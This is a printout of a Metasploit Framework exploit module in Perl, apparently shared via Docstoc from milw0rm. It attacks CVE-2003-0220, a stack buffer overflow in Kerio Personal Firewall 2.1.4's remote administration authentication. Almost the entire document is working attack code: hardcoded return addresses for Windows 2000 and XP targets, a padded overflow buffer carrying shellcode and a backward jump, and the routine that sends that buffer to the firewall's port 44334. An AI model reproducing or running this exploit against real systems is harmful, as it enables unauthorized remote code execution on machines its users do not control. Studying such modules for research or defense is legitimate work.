Docstoc

Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow

Document Sample
Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow Powered By Docstoc
					                       Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                     Page 1/3
     1    ##
     2    # This file is part of the Metasploit Framework and may be redistributed
     3    # according to the licenses defined in the Authors field below. In the
     4    # case of an unknown or missing license, this file defaults to the same
     5    # license as the core Framework (dual GPLv2 and Artistic). The latest
     6    # version of the Framework can always be obtained from metasploit.com.
     7    ##
     8
     9    package Msf::Exploit::kerio_auth;
     10   use base "Msf::Exploit";
     11   use strict;
     12   use Pex::Text;
     13
     14   my $advanced = { };
     15
     16   my $info =
     17     {
     18
     19          ’Name’ => ’Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow’,
     20          ’Version’ => ’$Revision: 1.1 $’,
     21          ’Authors’ => [ ’y0 [at] w00t−shell.net’, ],
     22          ’Arch’ => [ ’x86’ ],
     23          ’OS’      => [ ’win32’, ’win2000’, ’winxp’, ],
     24          ’Priv’ => 0,
     25          ’UserOpts’ => {
     26                    ’RHOST’ => [1, ’ADDR’, ’The target address’],
     27                    ’RPORT’ => [1, ’PORT’, ’The target port’, 44334],
     28                    ’SSL’     => [0, ’BOOL’, ’Use SSL’],
     29            },
     30          ’AutoOpts’ => { ’EXITFUNC’ => ’process’ },
     31          ’Payload’ => {
     32                    ’Space’       => 1000,
     33                    ’BadChars’ => "\x00",
     34                    ’Prepend’    => "\x81\xc4\x54\xf2\xff\xff",
     35                    ’Keys’        => [’−ws2ord’],
     36            },
     37
     38           ’Description’ => Pex::Text::Freeform(qq{
     39           This module exploits a stack overflow in Kerio Personal Firewall
     40   administration authentication process. This module has only been tested
     41   against Kerio Personal Firewall 2 2.1.4.
     42   }),
     43
     44           ’Refs’   => [
     45                     [’BID’, ’7180’],
     46                     [’CVE’, ’2003−0220’],
     47                     [’URL’, ’http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10’],
     48             ],
     49
     50          ’Targets’ => [
     51                    [’Windows 2000 Pro SP4 English’, 0x7c2ec68b],
     52                    [’Windows XP Pro SP0 English’,    0x77e3171b],
y0                                                                                                             02/28/2006
                         Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                           Page 2/3
     53                       [’Windows XP Pro SP1 English’,    0x77dc5527],
     54                  ],
     55
     56             ’Keys’ => [’firewall’],
     57
     58             ’DisclosureDate’ => ’Apr 28 2003’,
     59
     60        };
     61
     62    sub new {
     63            my $class = shift;
     64            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
     65            return($self);
     66    }
     67
     68    sub Exploit
     69    {
     70            my    $self = shift;
     71            my    $target_host = $self−>GetVar(’RHOST’);
     72            my    $target_port = $self−>GetVar(’RPORT’);
     73            my    $target_idx = $self−>GetVar(’TARGET’);
     74            my    $shellcode   = $self−>GetVar(’EncodedPayload’)−>Payload;
     75            my    $target = $self−>Targets−>[$target_idx];
     76
     77             if (! $self−>InitNops(128)) {
     78                     $self−>PrintLine("[*] Failed to initialize the nop module.");
     79                     return;
     80             }
     81
     82             my $sploit =
     83               Pex::Text::AlphaNumText(4268). $shellcode.
     84               pack(’V’, $target−>[1]). "\xe9\x0b\xfe\xff\xff";
     85
     86             $self−>PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target−>[0], $target−>[1]));
     87
     88             my $s = Msf::Socket::Tcp−>new
     89               (
     90                     ’PeerAddr’ => $target_host,
     91                     ’PeerPort’ => $target_port,
     92                     ’LocalPort’ => $self−>GetVar(’CPORT’),
     93                     ’SSL’         => $self−>GetVar(’SSL’),
     94               );
     95             if ($s−>IsError) {
     96                     $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
     97                     return;
     98             }
     99
     100            $s−>Send($sploit);
     101            $self−>Handler($s);
     102            $s−>Close();
     103            return;
     104   }
y0                                                                                                                     02/28/2006
                     Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow   Page 3/3
     105
     106   1;
     107
     108   # milw0rm.com [2006−02−28]




y0                                                                                         02/28/2006